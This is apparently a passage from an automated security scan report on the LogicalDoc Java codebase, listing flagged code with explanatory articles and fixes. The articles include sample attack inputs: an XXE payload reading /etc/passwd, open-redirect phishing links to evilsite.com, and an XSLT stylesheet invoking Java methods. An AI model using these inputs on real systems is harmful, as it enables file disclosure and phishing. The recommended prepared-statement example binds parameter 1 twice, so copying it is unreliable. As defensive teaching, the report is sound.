•Take note of the API developers’ usage suggestions. Almost every one of the aforementioned libraries uses the classic SQL injection protection methods: prepared queries. This mechanism allows you to generate dynamic SQL queries without being exposed to the threat of injection. Therefore, we recommend using prepared queries and heavily recommend against using string concatenation. Exampe 1 can therefore be rewritten as such, using prepared queries:

Javapublic class GetItemsServlet extends HttpServlet { public void doPost(HttpServletRequest request, HttpServletResponse response) { ... Connection con = getSqlConnection(); PreparedStatement stmt = null; String query = "SELECT * FROM items WHERE " + "user = ? AND itemtype = ?;"; try { stmt = con.prepareStatement(query); stmt.setString(1, request.getParameter(“user”));


stmt.setString(1, request.getParameter(“item”)); ResultSet rs = stmt.executeQuery(); while (rs.next()) { // process results and list } } catch (SQLException e ) { printSQLException(e); } finally { if (stmt != null) { stmt.close(); } } }}•

If string concatenation during SQL query generation is unavoidable, do not use user input data, or at least thoroughly validate it.

•Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the “accept known good” method for input filtration, such as using a whitelist that describes acceptable input format. All input that does not follow the format, described in the whitelist should be rejected. For example, if the expected input is an integer, reduce the input to an integer type;

•Whitelist-based input validation cannot always guarantee security. If the input may contain SQL escape characters, it must be screened or encoded.

•For the MySQL DBMS, the \,”,’,\00 (0 code symbol), \r (return), \n (new line), \t (tab), %, _, \b (backspace), \x1A (substitution) must be screened with a \. For example, “O’Henry” turns into “O\’Henry”.

Java: Incorrect user input filtration when passing control to external componentsSeverity: highLanguage: JavaShort description: This vulnerability occurs when the application loads an external module or library without pointing to the full path to the executable. When loading a file using a relative path, the system searches for it in directories, the order of which depends on the operating system. If the user can write a file into a directory that has a higher search priority than the actual path, or can access environmental variables, he can replace the executable with a malicious one.Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionProcessCreation.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/exec/Exec.javaCode:

157 * Execute the command by using the Runtime.exec158 */159 public static int exec(final String commandLine, String[] env, File dir, int timeout) throws IOException {160 int exit = 0;161162 final Process process = Runtime.getRuntime().exec(commandLine, env, dir);163164 if (timeout > 0) {165 ExecutorService service = Executors.newSingleThreadExecutor();166 try {167 Callable<Integer> call = new CallableProcess(process);

https://localhost:443/scanner/article?articleName=/en/Java/InjectionProcessCreation.html

https://localhost:443/scanner/article?articleName=/en/Java/InjectionProcessCreation.html


File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/exec/WinUtil.javaCode:

7 private static final String TASKLIST = "tasklist";89 private static final String KILL = "taskkill /IM ";1011 public static boolean isProcessRunning(String serviceName) throws Exception {12 Process p = Runtime.getRuntime().exec(TASKLIST);13 BufferedReader reader = new BufferedReader(new InputStreamReader(p.getInputStream()));14 String line;15 while ((line = reader.readLine()) != null) {16 if (line.toLowerCase().contains(serviceName.toLowerCase())) {17 return true;

Incorrect user input filtration when passing control to external components

This vulnerability occurs when the application loads an external module or library without pointing to the full path to the executable. When loading a file using a relative path, the system searches for it in directories, the order of which depends on the operating system. If the user can write a file into a directory that has a higher search priority than the actual path, or can access environmental variables, he can replace the executable with a malicious one.

Example

In this example, we take a look at a code fragment, where the program loads an external library without giving its full path:

JavaSystem.loadLibrary("library.dll");

The user can create a file called library.dll and place it in a directory with a higher search priority than the target one. The program will load the malicious file into its context and execute it with its own privileges. This grants the user control over the system.


This vulnerability lets the user execute any commands with the privileges of the application process.


When launching external modules using a call to Runtime.exec(), ProcessBuilder.start() and System.loadLibrary(), we recommend you use the absolute path to the executable file, and check it for integrity before launch.

Java: Redirecting the user to a malicious siteSeverity: highLanguage: JavaShort description: If the application redirects users to webpages based on input parameters, the malicious user can sometimes control the destination address.Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionRedirect.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.javaCode:

47 else48 successUrl.append("?");49 successUrl.append("tenant=");

https://localhost:443/scanner/article?articleName=/en/Java/InjectionRedirect.html

https://localhost:443/scanner/article?articleName=/en/Java/InjectionRedirect.html


50 successUrl.append(session.getTenantName());5152 response.setHeader(PARAM_SUCCESSURL, successUrl.toString());53 response.sendRedirect(successUrl.toString());54 }55 }56}

Attack details:






com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess5152 response.setHeader(PARAM_SUCCESSURL, successUrl.toString());53 response.sendRedirect(successUrl.toString());

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationSuccessHandler.javaCode:

48 successUrl.append("?");49 successUrl.append("tenant=");50 successUrl.append(session.getTenantName());5152 response.setHeader(PARAM_SUCCESSURL, successUrl.toString());53 response.sendRedirect(successUrl.toString());54 }55 }56}

Attack details:







com.logicaldoc.core.security.spring.LDAuthenticationSuccessHandler::onAuthenticationSuccess52 response.setHeader(PARAM_SUCCESSURL, successUrl.toString());53 response.sendRedirect(successUrl.toString());54 }

Redirecting the user to a malicious site

If the application redirects users to webpages based on input parameters, the malicious user can sometimes control the destination address.

The malicious user can create a special link the takes the following format: the domain name will belong to the vulnerable application, while the final destination will be a malicious site. For example, it can look like this:

Urlhttp://anybank.com/redirect.html?target=http://evilsite.com/

This allows the malicious user to perform a series of phishing attacks [1], since the user following the redirect will think he is at the original site.

Example 1

This example does not check the url parameter, which is a system vulnerability that can be used against resource users.

Javapublic class RedirectServlet extends HttpServlet { protected void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String query = request.getQueryString(); if (query.contains("url")) { String url = request.getParameter("url"); response.sendRedirect(url); } }}

Phishing attacks are an example of taking advantage of this vulnerability. Say the user receives an email that asks him to follow the following link:

Urlhttp://trusted.example.com/ecommerce/redirect.htm?url=http://evilsite.com/

The user follows that link, thinking it belongs to the trusted site trusted.example.com, while he will actually direct him to http://evilsite.com/.

A large subset of the users will be vaguely aware of proper safety procedures on the Internet. These users will study the link before clicking it. To bypass such measures, the link can be obfuscated with URL parameter encoding:

Urlhttp://trusted.example.com/ecommerce/redirect.htm?url=%77%69%6C%79%68%61%63%6B%65%72%2E%63%6F%6D

https://www.owasp.org/index.php/Phishing

https://www.owasp.org/index.php/Phishing


Note that this example is one of many ways to redirect a user to a desired resource using the HttpServletResponse class.Example 2Java@RequestMapping(method = RequestMethod.POST)public String processForm(String url){ return "redirect:" + url;}

Spring MVC simplifies web service development; while at the same time creates a vulnerability in your service. The redirect instruction is defined in the following way: if the url is relative path, the redirect is done locally. If the redirect is a full path, the user is sent to a different resource. The same result can be achieved using the ModelAndView class: you can send the same string to the constructor, and the user will be redirected to the new site.


Since the user assumes that he is still at the original site when redirected, he can trust the destination site with his login data, as well as other confidential information. As a result, the malicious can user can access the stolen data to steal the login information for the original site.

In addition to the above, this vulnerability makes the defense against CSRF [2] attacks pointless, since it is based on checking the Referrer header.


We recommend creating a centralized system that controls following any external links, such as Facebook. Any external redirect will trigger a page that notifies the user that he is leaving the current site;

•Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the “accept known good” method for input filtration, such as using a whitelist that describes acceptable input format. All input that does not follow the format, described in the whitelist should be rejected;

•In this context, you should use a list of trusted URL and domains

•If the page should absolutely not redirect the user to external resources, set up a check for whether the target URL is local or not. For example, a redirect can be described as an address of the current site plus the parameters passed on in the HTTP parameter.

Java: Incorrect Permissions for External Entities During XML Document ProcessingSeverity: mediumLanguage: JavaShort description: If the application allows the use of external entities in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities. Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.Full description: https://localhost:443/scanner/article?articleName=/en/Java/XmlXxe.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-cmis/src/main/java/com/logicaldoc/cmis/Converter.javaCode:

2655 }26562657 Document doc = null;2658

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

https://www.owasp.org/index.php/Cross-Site_Request_Forgery_%28CSRF%29

https://en.wikipedia.org/wiki/HTTP_referer

https://en.wikipedia.org/wiki/HTTP_referer

http://facebook.com/

http://facebook.com/

https://localhost:443/scanner/article?articleName=/en/Java/XmlXxe.html

https://localhost:443/scanner/article?articleName=/en/Java/XmlXxe.html


2659 try {2660 DocumentBuilderFactory dbfac = DocumentBuilderFactory.newInstance();2661 DocumentBuilder docBuilder = dbfac.newDocumentBuilder();2662 doc = docBuilder.newDocument();2663 } catch (Exception e) {2664 throw new CmisRuntimeException("Unable to convert extensions!", e);2665 }

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/XMLParser.javaCode:

36 public void internalParse(InputStream input) {37 try {38 CharArrayWriter writer = new CharArrayWriter();39 ExtractorHandler handler = new ExtractorHandler(writer);4041 SAXParserFactory factory = SAXParserFactory.newInstance();42 SAXParser parser = factory.newSAXParser();43 XMLReader reader = parser.getXMLReader();44 reader.setContentHandler(handler);45 reader.setErrorHandler(handler);46

Incorrect Permissions for External Entities During XML Document Processing

If the application allows the use of external entities [1] in user XML documents, then a malicious user can gain access to previously unavailable resources through these entities.

Depending on the application architecture, the malicious user can use the external entities for network interaction or reading files.

Example

In this example, we take a look at a code fragment, where we use the standard Java parser (JAXP) to process the XML file:

JavaInputStream is = request.getInputStream();DocumentBuilder builder = DocumentBuilderFactory.newInstance().newDocumentBuilder();Document document = builder.parse(is);NodeList list = document.getElementsByTagName("methodName");Node methodNode;

for (int i=0; i < list.getLength(); i++){ methodNode = list.item(i); string methodName = methodNode.getTextContent(); switch(methodName) { case "getBalance": case "getInfo": case "changeInfo": doingSomething(); break; default: printErrorMessage("<Error>Method is not supported:"+ methodName); break; }}

If the user passes the following XML document in his query:

Xml


<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/passwd'> ]><methodCall> <methodName>&e;</methodName></methodCall>

Then, after resolving external entities in the methodName field (and, therefore, the error message), the contents of the /etc/passwd file on the application server will be returned.


This vulnerability can lead to the following:

•Reading files, local to the application server;

•Performing network interactions between the application server and other objects, including local network objects (see SSRF[2]);

•Denial of Service (DoS) for the application server.


We recommend turning off the permissions for external XML entities when working with user XML documents. To do so, JAXP needs to use the following calls:

JavadbFactory = DocumentBuilderFactory.newInstance();dbFactory.setFeature("http://xml.org/sax/features/external-general-entities", false);dbFactory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

In addition to that, we recommend turning off XML validation (despite the fact that it is off by default):

JavadbFactory.setValidating(false);

To further protect against DoS attacks, based on processing complex XML documents, as well as against XML Entity Expansion attacks, we recommend turning on the javax.xml.XMLConstants.FEATURE_SECURE_PROCESSING option:

JavadbFactory.setFeature (XMLConstants.FEATURE_SECURE_PROCESSING, true);

Java: Incorrect User Input Filtration when Using the Reflection MechanismSeverity: mediumLanguage: JavaShort description: When generating class names for dynamic loading by the Reflection mechanism, the application could use data from external sources without properly filtering them. This gives the malicious user the ability control the application control stream and make calls to any commands.Full description: https://localhost:443/scanner/article?articleName=/en/Java/InjectionReflection.html


129 }130 }131132 protected void doConnection() {133 try {

https://localhost:443/scanner/article?articleName=/en/Java/InjectionReflection.html

https://localhost:443/scanner/article?articleName=/en/Java/InjectionReflection.html


134 Class.forName(driver);135 con = DriverManager.getConnection(url, username, password);136 con.setAutoCommit(true);137 } catch (Exception ex) {138 log.error(ex.getMessage(), ex);139 }

Attack details:


com.logicaldoc.web.service.SetupServiceImpl::createDB212 init.setDbms(info.getDbEngine());213 init.setDriver(info.getDbDriver());214 init.setUrl(adminjdbcUrl);


com.logicaldoc.util.dbinit.DBInit::setDriver180 public void setDriver(String driver) {181 this.driver = driver;182 }


com.logicaldoc.util.dbinit.DBInit::doConnection133 try {134 Class.forName(driver);135 con = DriverManager.getConnection(url, username, password);


164 */165 public boolean testConnection() {166 boolean result = false;167168 try {169 Class.forName(driver);170 con = DriverManager.getConnection(url, username, password);171 result = true;172 con.close();173 } catch (Exception ex) {174 log.error(ex.getMessage(), ex);

Attack details:


com.logicaldoc.web.service.SetupServiceImpl::createDB212 init.setDbms(info.getDbEngine());213 init.setDriver(info.getDbDriver());214 init.setUrl(adminjdbcUrl);


com.logicaldoc.util.dbinit.DBInit::setDriver180 public void setDriver(String driver) {181 this.driver = driver;182 }



com.logicaldoc.util.dbinit.DBInit::testConnection168 try {169 Class.forName(driver);170 con = DriverManager.getConnection(url, username, password);

Incorrect User Input Filtration when Using the Reflection Mechanism

When generating class names for dynamic loading by the Reflection mechanism, the application could use data from external sources without properly filtering them. This gives the malicious user the ability control the application control stream and make calls to any commands.

Example

Let's take a look at a command dispatcher implementation:

JavaString ctl = request.getParameter("ctl");Class cmdClass = Class.forName(ctl + "Command");Worker ao = (Worker) cmdClass.newInstance();ao.doAction(request);

Using this form, the user selects the name of the command that needs to be executed. Even if the page has a mechanism in place to limit command names, the malicious user can create any object that supports the Worker interface and execute it.

Moreover, the constructor will be called by default even if the loaded class does not support the interface. For small applications, this is not particularly critical. However, in the case of a large complex application, a class can be found that can severely affect the application's work if its constructor is called.

If the application also has a vulnerability that allows the user to load any files to the server, the malicious user would gain access to the whole system by executing any code.


This vulnerability can have the following consequences:

•system hanging;

•data corruption;

•executing malicious code.


Avoid using user input when generating class names used by the Reflection mechanism;

•Assume that all data coming from the client is a potential threat, including hidden form fields and cookies. We recommend using the "accept known good" method for input filtration, such as using a whitelist that describes acceptable input format. All input that does not follow the format, described in the whitelist should be rejected. For example, if the expected input is an integer, reduce the input to an integer type;

•


As an alternative solution, you can use mediated value selection. In other works, the user will be given a list of identifier that are used as a base to generate class names. This way, the user can only select values that are contained in a prepared dictionary ahead of time;

•We recommend against using blacklists to filter class and method names since it is impossible to predict all user input variations.

Java: Missing Verification of Executable Files' Digital Signature when Executing them from Untrusted SourcesSeverity: mediumLanguage: JavaShort description: If an application uses executable files in its work, and does not check their digital signature, then then the malicious user could replace the files with their own versions. The malicious code from this file will then be loaded into the application context, and will be run with application process privileges.Full description: https://localhost:443/scanner/article?articleName=/en/Java/CommonJarFileVerification.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/io/JarUtil.javaCode:

40 }41 if (!targetDir.exists()) {42 FileUtils.forceMkdir(targetDir);43 }4445 JarFile jar = new JarFile(jarsource);46 JarEntry jare;4748 for (Enumeration enum1 = jar.entries(); enum1.hasMoreElements(); saveEntry(jar, jare, target)) {49 jare = (JarEntry) enum1.nextElement();50 }

File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/io/JarUtil.javaCode:

75 }76 if (!targetDir.exists()) {77 FileUtils.forceMkdir(targetDir);78 }7980 JarFile jar = new JarFile(jarsource);81 JarEntry jare = new JarEntry(entry);82 saveEntry(jar, jare, target);83 } catch (Exception e) {84 result = false;85 log.error(e.getMessage(), e);

Missing Verification of Executable Files' Digital Signature when Executing them from Untrusted Sources

https://localhost:443/scanner/article?articleName=/en/Java/CommonJarFileVerification.html

https://localhost:443/scanner/article?articleName=/en/Java/CommonJarFileVerification.html


If an application uses executable files in its work, and does not check their digital signature, then then the malicious user could replace the files with their own versions. The malicious code from this file will then be loaded into the application context, and will be run with application process privileges.

Example

Let's take a look at an example of a service with extendable functionality. Suppose the service compiles data from various sources. When a new data source is added, the service must be extended in such a way that it could read the new message format. In order to do this, the following function for loading the modules on the fly is present:

JavaFile f = new File(downloadedFilePath);JarFile jf = new JarFile(f);

The loaded file is received from an external source, and does not get verified for integrity or for its digital signature. The malicious user could then execute a "man in the middle" attack [1], and replace the loaded file with one of their own. The malicious code will then be run in the context of the service with all of its privileges. For example, such code could intercept incoming messages and change them, or forward them to a malicious user's account.

Potential Consequences•

Launching malicious executable code with application privileges and intercepting control of the system;

•Compromising confidential information.

Removal Recommendations

Before launching executable code, received from untrusted sources, we recommend checking their integrity and verify their digital signature. We recommend against accepting unsigned executable files from external sources.

With these recommendations, we can rewrite the example as such:

JavaFile f = new File(downloadedFilePath);JarFile jf = new JarFile(f, true);

If the file is unsigned, or the signature is compromised, the system throws a SecurityException

Java: Using XSL Transformation to Execute Any CodeSeverity: mediumLanguage: JavaShort description: The Jaxp parser for XSL transformations (XSLT) uses the XALAN processor that allows you to add specifications to the XSL file that create objects and call Java object and static methods [1]. This means that the malicious user can add a wide variety of calls to critical methods that would be executed on the server with processor privileges. Therefore, when transforming an XML file, you use an XSL file from an untrusted source, the malicious user can inject instructions that will be executed on the attacked server.Full description: https://localhost:443/scanner/article?articleName=/en/Java/XsltCodeExecution.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/parser/HTMLParser.javaCode:

77 }78

https://localhost:443/scanner/article?articleName=/en/Java/XsltCodeExecution.html

https://localhost:443/scanner/article?articleName=/en/Java/XsltCodeExecution.html


79 @Override80 public void internalParse(InputStream input) {81 try {82 TransformerFactory factory = TransformerFactory.newInstance();83 Transformer transformer = factory.newTransformer();8485 XMLParserConfiguration parserConfig = new HTMLConfiguration();8687 ElementRemover remover = new ElementRemover();

Using XSL Transformation to Execute Any Code

The Jaxp parser for XSL transformations (XSLT) uses the XALAN processor that allows you to add specifications to the XSL file that create objects and call Java object and static methods [1]. This means that the malicious user can add a wide variety of calls to critical methods that would be executed on the server with processor privileges.

Therefore, when transforming an XML file, you use an XSL file from an untrusted source, the malicious user can inject instructions that will be executed on the attacked server.

Example 1

In 2011, the LifeRay open corporate portal creation system had a vulnerability in its XSL Portlet component [1]. This component, designed for the processing and display of XML ribbons of external services, functioned as follows: the user added the address of the XML ribbon and the XSL schema to the page, which let him filter the ribbon in a necessary fashion.

To perform the attack, the malicious user had to do the following:

•Login to the portal with his account;

•Create a new page, if necessary;

•Create the XSL Portlet on his page, and set it up in a way that it would use the XSL file, containing calls to the necessary commands;

•Send a request to the page to activate the XSL processor. As a result, the commands, written in the infected XSL file were run in the context of the user that the portal server was authorized on.

Example 2

In this example, we are looking at a function that performs the XSLT. This function receives the XML file dataXML, the transformation schema inputXSL, and writes the result in the outputHTML file. We use the standard XML parser JAXP to perform the transformation.

Javapublic void transform(String dataXML, String inputXSL, String outputHTML) throws TransformerConfigurationException, TransformerException { TransformerFactory factory = TransformerFactory.newInstance(); StreamSource xslStream = new StreamSource(inputXSL); Transformer transformer = factory.newTransformer(xslStream); StreamSource in = new StreamSource(dataXML); StreamResult out = new StreamResult(outputHTML); transformer.transform(in, out);}

If the inputXSL file is received form an untrusted source, and the malicious user added the following fragment to it:

Xml<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"


xmlns:jv="http://xml.apache.org/xalan/java" exclude-result-prefixes="jv" version="1.0"> <xsl:template match="/"> <root> <xsl:variable name="osversion" select="jv:java.lang.System.getProperty('os.name')"/> <xsl:value-of select="$osversion" /> </root> </xsl:template></xsl:stylesheet>

Then, no matter what the dataXML file contains, the outputXML file will contain the following:

Xml<?xml version="1.0" encoding="UTF-8"?><root>Windows Server 2008</root>

If this file is published, the malicious user will have access to critical information, or, if he adds other function calls in the XSL file, will be able to access some server application commands.


This vulnerability can lead to the following consequences:

•Running any code on the server side with strong privileges;

•Giving the malicious user access to critical information.


To perform an XSL transformation on an XML file, we highly recommend against using XSL schema that are received from outside sources.

In the case that using external XSL schema is necessary, we recommend using the secure XML processing option. You can do it in two ways:

Javafactory.setFeature("http://javax.xml.XMLConstants/feature/secure-processing", true);

or

Javafactory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);

After using this option, upon finding Java code calls, the parser will throw an exception.

Java: Direct management of database connections in j2ee applicationsSeverity: lowLanguage: JavaShort description: The J2EE standard forbids directly connecting to the database. In order to establish a connection, the application must use centralized resource management systems, which are built into the application container.Full description: https://localhost:443/scanner/article?articleName=/en/Java/J2eeRestrictionDatabaseConnection.html

https://localhost:443/scanner/article?articleName=/en/Java/J2eeRestrictionDatabaseConnection.html






165 public boolean testConnection() {166 boolean result = false;167168 try {169 Class.forName(driver);170 con = DriverManager.getConnection(url, username, password);171 result = true;172 con.close();173 } catch (Exception ex) {174 log.error(ex.getMessage(), ex);175 }


130 }131132 protected void doConnection() {133 try {134 Class.forName(driver);135 con = DriverManager.getConnection(url, username, password);136 con.setAutoCommit(true);137 } catch (Exception ex) {138 log.error(ex.getMessage(), ex);139 }140 }

Direct management of database connections in j2ee applications

The J2EE standard forbids directly connecting to the database. In order to establish a connection, the application must use centralized resource management systems, which are built into the application container.

Example

Let’s take a look at an example where we use DriverManager to connect to the database:

Javapublic class DatabaseConnection { private static final String CONNECT_STRING = "jdbc:mysql://localhost:3306/mysqldb";

private Connection conn = null;

public void openDatabaseConnection() { try { conn = DriverManager.getConnection(CONNECT_STRING); } catch (SQLException ex) {...} }

public Connection getConnection(){ return connection; }}

This approach has several drawbacks. Every application container has its own resource management mechanisms, including one that provides a prepared pool of connections to the database. Using DriverManager to create new connections doubles the centralized mechanism, which is poor practice. In addition, creating a fully realized resource dispatcher is a difficult task, which can lead to


development errors, and takes extra time as is. This is one of the reasons that this practice is forbidden by the standard.


This method can lead to irrational use of application resources.


The standard recommends using built-in application container resource management methods. Particularly, the above example should be rewritten as such:

Javapublic class DatabaseConnection {

private static final String DB_DATASRC_REF = "jdbc:mysql://localhost:3306/mysqldb"; private Connection conn = null;

public DatabaseConnection() { }

public void openDatabaseConnection() { try { InitialContext ctx = new InitialContext(); DataSource datasource = (DataSource) ctx.lookup(DB_DATASRC_REF); conn = datasource.getConnection(); ... } catch (NamingException ex) {...} } catch (SQLException ex) {...} }}

Java: Direct use of threads in a J2EE applicationSeverity: lowLanguage: JavaShort description: Direct use of threads is forbidden in J2EE applications as a potential error source. Thread management is a complicated task, and there is a high chance of synchronization errors when doing so manually. Debugging such errors is a waste of development resources.Full description: https://localhost:443/scanner/article?articleName=/en/Java/J2eeRestrictionThread.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-util/src/main/java/com/logicaldoc/util/io/FileUtil.javaCode:

578 for (int i = 0; i < 20; i++) {579 FileUtils.deleteQuietly(file);580 if (!file.exists())581 break;582 try {583 Thread.sleep(1000);584 } catch (InterruptedException e) {585 }586 }587 }588

https://localhost:443/scanner/article?articleName=/en/Java/J2eeRestrictionThread.html

https://localhost:443/scanner/article?articleName=/en/Java/J2eeRestrictionThread.html



218 }219 }220 });221222 // And launch it223 zipImporter.start();224 } else {225 // Create the document history event226 History transaction = new History();227 transaction.setSession(session);228 transaction.setEvent(DocumentEvent.STORED.toString());


197 FileUtils.copyFile(file, destFile);198199 final long userId = session.getUserId();200 final String sessionId = session.getId();201 // Prepare the import thread202 Thread zipImporter = new Thread(new Runnable() {203 public void run() {204 /*205 * Prepare the Master document used to create the206 * new one207 */208 Document doc = toDocument(metadata);209 doc.setTenantId(session.getTenantId());210 doc.setCreation(new Date());211212 InMemoryZipImport importer = new InMemoryZipImport(doc);213 importer.process(destFile, parent, userId, sessionId);214 try {215 FileUtils.forceDelete(destFile);216 } catch (IOException e) {217 log.error("Unable to delete " + destFile, e);218 }219 }220 });221222 // And launch it223 zipImporter.start();224 } else {225 // Create the document history event


106 throw new RuntimeException(t.getMessage(), t);107 }108 }109 };110111 Thread recreateThread = new Thread(task);112 recreateThread.start();113114 return;115 }116



107 }108 }109 };110111 Thread recreateThread = new Thread(task);112 recreateThread.start();113114 return;115 }116117 @Override


639640 try {641 for (Task task : manager.getTasks()) {642 if (task.getName().equals(taskName)) {643 Thread thread = new Thread(task);644 thread.start();645 break;646 }647 }648649 return true;


638 TaskManager manager = (TaskManager) Context.get().getBean(TaskManager.class);639640 try {641 for (Task task : manager.getTasks()) {642 if (task.getName().equals(taskName)) {643 Thread thread = new Thread(task);644 thread.start();645 break;646 }647 }648

Direct use of threads in a J2EE application

Direct use of threads is forbidden in J2EE applications as a potential error source. Thread management is a complicated task, and there is a high chance of synchronization errors when doing so manually. Debugging such errors is a waste of development resources.

Example

In this example, upon receiving a get request from the server, the servlet starts a new thread by using the Thread.start() method:

Javapublic void doGet(HttpServletRequest request, HttpServletResponse response)


throws ServletException, IOException { // Perform servlet tasks. ...

// Create a new thread to handle background processing. Runnable r = new Runnable() { public void run() { // Process and store request statistics. ... } }; new Thread(r).start();}Potential consequences

Direct use of threads in J2EE applications can lower overall code quality, creating further debugging and support problems.

Using the Thread class is often correlated with synchronization errors, such as thread racing and mutual blocking. These errors are difficult to debug, and they can result in undefined system states, or even a system shutdown.


When working at a development stage on a J2EE project, we recommend against direct thread use. If it is necessary to perform background task asynchronously, we recommend using a thread planner and dispatcher, such as Executors.

Using this, we can rewrite the example as such:

Javaprivate static final ExecutorService SERVICE = Executors.newCachedThreadPool();

@Overrideprotected void doGet( HttpServletRequest req, HttpServletResponse resp ) throws ServletException, IOException{ // Perform servlet tasks. ... // Process and store request statistics in database SERVICE.submit( new ProcessRequestInformationRunnable( collectRequestInformation(req) ) );}


Java: Failure to remove temporary files after useSeverity: lowLanguage: JavaShort description: If the application creates temporary files, but does not delete them afterwards, it could create a huge amount after a while. Temporary file buildup can lead to taking up the entirety of disk space, and, as a result, productivity drop, or even system shutdown. Temporary files can also contain critical information, which could give a malicious user access to confidential data/information, which could be used later to perform an attack on the system.Full description: https://localhost:443/scanner/article?articleName=/en/Java/CommonLeavingTemporaryFile.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/document/pdf/PdfConverterManager.javaCode:

164 * Write a document into a temporary file.165 * 166 * @throws IOException167 */168 private File writeToFile(Document document, String fileVersion) throws IOException {169 File target = File.createTempFile("scr", "." + FilenameUtils.getExtension(document.getFileName()));170 String fver = getSuitableFileVersion(document, fileVersion);171 String resource = storer.getResourceName(document.getId(), fver, null);172 storer.writeToFile(document.getId(), resource, target);173 return target;174 }

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/document/thumbnail/ThumbnailManager.javaCode:

168 * Write a document into a temporary file.169 * 170 * @throws IOException171 */172 private File writeToFile(Document document, String fileVersion) throws IOException {173 File target = File.createTempFile("scr", "." + FilenameUtils.getExtension(document.getFileName()));174 String fver = getSuitableFileVersion(document, fileVersion);175 String resource = storer.getResourceName(document.getId(), fver, null);176 storer.writeToFile(document.getId(), resource, target);177 return target;178 }

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/LogDownload.javaCode:

142 }143144 // Now create a copy of the configuration and store it in thee145 // zip file146 ContextProperties cp = new ContextProperties();147 File buf = File.createTempFile("context", ".properties");148 OrderedProperties prop = new OrderedProperties();149 for (String key : cp.getKeys()) {150 if (key.contains("password"))

https://localhost:443/scanner/article?articleName=/en/Java/CommonLeavingTemporaryFile.html





151 continue;152 else

File name: logicaldoc/logicaldoc-webapp/src/main/java/com/logicaldoc/web/LogDownload.javaCode:

108109 /**110 * Prepare all log files plus the context.properties in one single zip.111 */112 private File prepareAllLogs(HttpServletResponse response) {113 File tmp = null;114115 try {116 tmp = File.createTempFile("logs", ".zip");117 ZipOutputStream out = new ZipOutputStream(new FileOutputStream(tmp));118


1116 mail.setSentDate(new Date());1117 mail.setSubject(email.getSubject());1118 mail.setUsername(session.getUsername());11191120 // Needed in case the zip compression was requested by the user1121 File zipFile = null;11221123 if (email.isSendAsTicket()) {1124 // Prepare a new download ticket1125 Ticket ticket = prepareTicket(email.getDocIds()[0], session.getUser());1126

Failure to remove temporary files after use

If the application creates temporary files, but does not delete them afterwards, it could create a huge amount after a while. Temporary file buildup can lead to taking up the entirety of disk space, and, as a result, productivity drop, or even system shutdown. Temporary files can also contain critical information, which could give a malicious user access to confidential data/information, which could be used later to perform an attack on the system.

Example

In this example, the application creates a temporary file, and does delete is after use:

Java...File file = File.createTempFile( prefix, suffix );...System.out.println("Writing to " + file.getAbsolutePath());...

This code can be used, for example, in a mail client. Creating a separate file for reading an attachment is a good idea, especially for large actions. However, since the file does not get deleted after the program is shut down, the disk space is still taken up by the temporary file. The system administrator has to delete it manually.

After the user finished working with the system, the file becomes open to all system users.




•Compromising application data;

•Disk space overflow and, as a result, system malfunction or shutdown;

•System information leak that can be used for a later attack.


We recommend deleting temporary files as soon as work with them finishes, or least as the application is shut down.

Standard Java libraries have several tools for working with temporary files:

•In java.io[1] package:

•The File.deleteOnExit() file marks the files to be deleted. When the virtual machine starts the shutdown procedure, it will delete the file;

•You can use File.delete() to manually delete it as soon as it is no longer useful.

•In the java.nio [2] package:

•When opening a filestream, you can use the StandardOpenOption.DELETE_ON_CLOSE flag, which will delete the file when the close() method is called. If the stream does not get closed by the application, the file will be delete on virtual system shutdown (as well as when possible during emergency shutdowns);

•The file can be deleted manually after use by using the Files.delete(Path) and Files.deleteIfExists(Path) methods.

JVM also gives an overall resource cleanup mechanism on system shutdown, called Shutdown Hooks [3]. This mechanism allows you to create a procedure that will be launched on JVM shutdown. In this case, we can do this:

JavaRuntime.getRuntime().addShutdownHook(new Thread() { public void run() { // cleanup code }});

Java: HttpOnly CookiesSeverity: lowLanguage: JavaShort description: If the web application uses cookies that are available to browser scripts, and the application is vulnerable to Cross-Site Scripting (XSS) attacks, the malicious user could easily access the victim's cookies and use it to their own ends.


Full description: https://localhost:443/scanner/article?articleName=/en/Java/CommonHttpOnlyCookie.html

Found Vulnerabilities:File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/SessionManager.javaCode:

291 public void saveSessionId(HttpServletRequest request, HttpServletResponse response, String sessionId) {292 request.setAttribute(PARAM_SID, sessionId);293 if (request.getSession(false) != null)294 request.getSession(false).setAttribute(PARAM_SID, sessionId);295296 Cookie sidCookie = new Cookie(COOKIE_SID, sessionId);297 response.addCookie(sidCookie);298 }299300 /**301 * Saves the session identifier in the request

File name: logicaldoc/logicaldoc-core/src/main/java/com/logicaldoc/core/security/spring/LDAuthenticationFailureHandler.javaCode:

